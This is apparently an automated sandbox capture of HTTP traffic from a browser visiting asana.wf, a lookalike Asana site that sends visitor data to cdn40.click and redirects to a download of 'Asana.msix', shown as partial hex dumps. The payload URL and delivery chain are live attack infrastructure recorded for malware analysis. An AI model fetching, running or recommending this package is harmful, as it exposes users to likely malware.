                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6b 6b f0 e1 74 74 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 6a ef 41 6a 6a f0 fc 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0
                                                                                                                                                                                                                    Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjkkttjjAjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC1736INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff
                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    52192.168.2.164975923.133.88.1904432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC652OUTPOST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1
                                                                                                                                                                                                                    Host: cdn40.click
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Content-Length: 252
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Origin: https://asana.wf
                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC252OUTData Raw: 7b 22 66 22 3a 22 33 39 62 32 34 35 33 36 2d 66 33 33 66 2d 34 38 65 65 2d 39 64 36 33 2d 34 37 32 33 65 34 32 65 31 36 66 39 22 2c 22 6d 22 3a 22 32 35 22 2c 22 70 61 67 65 22 3a 22 2f 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 34 2d 32 35 54 31 39 3a 35 34 3a 35 37 2e 30 35 35 5a 22 2c 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 2c 22 75 73 65 72 5f 61 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 7d
                                                                                                                                                                                                                    Data Ascii: {"f":"39b24536-f33f-48ee-9d63-4723e42e16f9","m":"25","page":"/","timestamp":"2024-04-25T19:54:57.055Z","ip":"185.152.66.230","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"}
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC286INHTTP/1.1 201 Created
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:00 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    X-Powered-By: Express
                                                                                                                                                                                                                    access-control-allow-origin: https://asana.wf
                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                    ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    53192.168.2.164976094.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC371OUTGET /assets/img/brand/asana-logo-favicon.ico HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC266INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:00 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "a2be-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 41662
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC7926INData Raw: 00 00 01 00 01 00 64 64 00 00 01 00 20 00 a8 a2 00 00 16 00 00 00 28 00 00 00 64 00 00 00 c8 00 00 00 01 00 20 00 00 00 00 00 40 9c 00 00 23 2e 00 00 23 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: dd (d @#.#.
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 e9 6c 6c eb 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 6a f0 ba 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0
                                                                                                                                                                                                                    Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjlljjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6b 6b f0 e1 74 74 e8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 6a ef 41 6a 6a f0 fc 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0 ff 6a 6a f0
                                                                                                                                                                                                                    Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjkkttjjAjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2024-04-25 19:55:00 UTC1736INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff f0 00 00 00 ff ff ff ff ff ff ff
                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    54192.168.2.164976294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:02 UTC698OUTGET /download.php HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:03 UTC217INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:02 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Location: https://cdn40.click/files/Asana.msix
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    55192.168.2.164976523.133.88.1904432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:04 UTC704OUTGET /files/Asana.msix HTTP/1.1
                                                                                                                                                                                                                    Host: cdn40.click
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:04 UTC255INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:04 GMT
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Content-Length: 1063870
                                                                                                                                                                                                                    Last-Modified: Wed, 24 Apr 2024 12:24:24 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    ETag: "6628f9f8-103bbe"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    2024-04-25 19:55:04 UTC16129INData Raw: 50 4b 03 04 2d 00 0e 00 08 00 d1 2a 98 58 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 52 65 67 69 73 74 72 79 2e 64 61 74 ec 7d 0b 7c 1c c5 99 67 9b a7 31 2f 41 bc 89 20 e0 8c 81 b0 10 90 d0 63 24 8d 08 c8 33 1a 49 96 b0 5e 68 e4 07 8e 88 dd 33 d3 92 c6 1a cd 0c f3 d0 c3 c4 64 c8 e6 88 2f 40 e2 db 07 78 09 21 5a 2e 61 9d e3 97 44 40 1e 0e 47 16 71 f9 81 7d 6c 76 57 b9 fc 36 eb 25 64 a3 90 5c 56 90 65 e3 63 73 1b 93 07 dc ff 5f d5 35 d3 1a cd a8 db c6 06 df 46 25 7d d3 dd d5 5f d5 f7 ac af aa ab ab bb 93 c6 d0 e0 0a 4d d3 08 2a 71 ff 74 f3 80 fb 2e ee 4f 2f c4 61 d6 3b 91 7a 06 fb 86 ac bc be 13 3c fc 47 a1 59 fe 44 dd 8a 33 bf f4 e2 ea e6 fb 5e 58 56 e9 7f 14 a3 2e cb b1 ac 81 65 0d 2c 6b 60 59 03 cb 1a 58 d6 c0 b2 06 96 35 b0 ac 81 65 0d 2c 6b a0 84
                                                                                                                                                                                                                    Data Ascii: PK-*XRegistry.dat}|g1/A c$3I^h3d/@x!Z.aD@Gq}lvW6%d\Vecs_5F%}_M*qt.O/a;z<GYD3^XV.e,k`YX5e,k
                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: b0 9f ee 0b 3e 12 86 a7 d4 62 f1 e0 a1 de c9 c9 c9 a9 dc f4 f2 02 9c 3b cf 64 32 37 bc bd d5 d4 d4 e8 74 fa 9b 37 6f 36 91 48 f6 b3 80 b5 b5 35 16 8b c5 c6 c6 8e f4 f2 66 63 07 6c b8 b9 d1 68 b4 a9 a9 29 d6 e2 62 6f 6f 2f 83 c1 b0 b2 b6 de 70 75 dd 4e 4e 6e 6f 6f 3f e8 ea da f4 f3 db 0a 0b ab af af cf cd cb 83 40 74 c4 c4 ae 13 49 24 26 16 7b 7c 1a ee e8 b8 57 56 b6 93 95 75 85 87 27 3e 3e fe 96 82 82 bb 3b e2 70 78 d8 df df ff 68 7d bd a2 a2 82 42 a1 ec 53 a9 bb f9 f9 ac 99 19 23 23 e3 b0 30 8c 9d bd fd 76 46 86 a4 a4 54 54 74 b4 90 90 f0 ef b6 36 85 db 77 a0 50 e8 6e 71 f1 3e 99 cc 8c 8d 65 a0 73 ea 4f 1b 3d 36 82 e9 3e 0c cd 5a 23 71 c2 67 29 20 9c 70 4f 3b 9e cd 27 42 e2 0c 16 d8 a5 27 07 be ae a1 d1 77 72 02 97 1a 19 b8 51 3b 4b 3c c0 4f 65 7d 7e af
                                                                                                                                                                                                                    Data Ascii: >b;d27t7o6H5fclh)boo/puNNnoo?@tI$&{|WVu'>>;pxh}BS##0vFTTt6wPnq>esO=6>Z#qg) pO;'B'wrQ;K<Oe}~
                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: c5 d7 c5 c3 f4 d7 f5 28 38 d0 f9 13 24 74 2e 8a 41 77 c5 41 f7 15 0e d0 ce dd 04 49 ca 8f 58 3b d3 f6 ed 21 38 e9 18 52 cc d9 ab 99 f2 83 b0 58 62 76 dd f7 53 44 83 a4 82 a5 c5 34 c3 77 8a 3e b0 34 13 93 cb 4c d1 fe c3 f9 64 a8 c3 f3 d9 7b 60 24 4b b5 56 6c 26 35 0b 8e 6f c5 56 e9 7d a0 e1 bc 35 74 ae 1a ad d8 b6 39 b5 b1 78 94 5e 6c 8f 24 74 b3 d2 72 ad 38 83 95 ce d6 8a 33 e1 64 23 e3 e1 49 85 b3 3b 50 dd 60 43 24 d3 3c 6e 58 1a d0 5e a5 e1 2c ef 1c b2 24 0a 9b de 48 ca 13 3d af 7b 04 6f 6c 0e 19 49 6f c6 9e 27 8c 79 56 ff 8b 0e c5 9b 32 e5 c5 ec 55 f9 d5 b5 96 84 ad 13 54 05 be c8 64 ab 1c fd ec 76 58 09 14 3b b4 17 b3 d9 8b 0e 58 ff 1b 70 ec 0c e6 8b 6c bd 52 d5 5c b0 5f a8 8a 6e 9e 02 b3 2e b4 46 56 98 09 8b b1 b3 3d 70 0a 08 7f ce d4 69 67 09 97 cd
                                                                                                                                                                                                                    Data Ascii: (8$t.AwAIX;!8RXbvSD4w>4Ld{`$KVl&5oV}5t9x^l$tr83d#I;P`C$<nX^,$H={olIo'yV2UTdvX;XplR\_n.FV=pig
                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: f9 34 74 bc 60 63 3f ab 80 c7 05 da cf cb 86 4b 31 98 e7 1f 06 f6 6e 34 75 8a 6e ea 05 1c 09 73 50 ea 5d a5 d7 80 0e 24 1c 9b ac fd f4 ca 7f 42 23 b8 9f ae cf c0 b6 b8 16 3f d6 f9 49 f9 af cf c6 10 e9 4d 90 fe eb e1 f8 4d 47 39 83 47 ee 54 38 b1 76 20 3b b0 87 0e b2 35 ab 86 cf 1c 0a b9 49 c9 ed 5d a4 dd db b2 b8 01 e3 1f 02 c0 c1 ae 61 5b 16 62 51 da 1a ed 8d 08 78 13 4d 5b 83 41 c4 11 c8 01 78 2e 00 f1 be 7f 93 e2 62 5b f0 19 0e d7 59 1d b8 b9 d6 36 38 bd fe 0e 6e 39 d9 4e 73 d3 c6 7e 8d f6 85 fa 53 e1 0d 1d a2 22 b1 29 55 7c 62 df e4 9a e5 f7 0c 96 15 26 c3 9b 37 0c f8 32 84 72 eb dd e4 c8 7b ab 6f 86 28 cb 54 a2 07 e7 8d 55 f9 eb ec 46 15 cc 19 5d a2 2e 1f 62 85 83 be 76 f8 0c f7 f6 0c 3d 7b e3 b2 2c 8f fb f1 ed e8 c0 5a 67 c1 90 fb f1 ad 78 12 cb b3
                                                                                                                                                                                                                    Data Ascii: 4t`c?K1n4unsP]$B#?IMMG9GT8v ;5I]a[bQxM[Ax.b[Y68n9Ns~S")U|b&72r{o(TUF].bv={,Zgx
                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: 16 05 10 41 08 bc 38 b2 1a e0 63 e1 15 02 7c ba 04 43 aa 66 99 ea e1 37 02 96 be 92 51 2d d8 05 19 c6 11 6f 3c 7b 94 1a c8 73 b2 0d eb 18 ce 46 78 68 3f da 49 ad e8 94 c9 cd b2 ad fe 9a a0 fb 34 3d 18 7a e1 fe 4b 08 b0 f0 8f 00 89 58 7f c2 b1 dd d0 58 4f 42 f9 cf 4f 41 aa b1 d0 9d c6 1e 67 43 37 1b 23 f4 c1 fa fb 43 7f c0 58 4f a9 e0 0d 00 83 6f b1 71 c2 4d 22 1a 7d 9a 9a d7 a5 96 e3 f4 0f d8 a4 ec 18 02 35 43 2d a6 65 4c b4 7f b9 b7 82 7f ed 4b 7a 97 12 11 c7 dc 83 66 77 18 b8 bb 45 cf 4c c0 1a df f7 5b 5a b2 e8 f2 65 18 17 87 31 34 8c 77 6c 7f 2e 85 1d 82 36 6b bd bc 2e 53 d0 0c 58 0b c5 80 24 7e 80 f2 90 87 bb af 8b c9 c3 5e 23 f4 32 e1 e8 12 18 ae af 67 a5 38 41 c9 82 65 21 52 6f c3 a2 80 03 85 22 f5 ce 48 37 ff 0a 46 a7 2e cb cb ad a2 86 6c c8 40 f1
                                                                                                                                                                                                                    Data Ascii: A8c|Cf7Q-o<{sFxh?I4=zKXXOBOAgC7#CXOoqM"}5C-eLKzfwEL[Ze14wl.6k.SX$~^#2g8Ae!Ro"H7F.l@
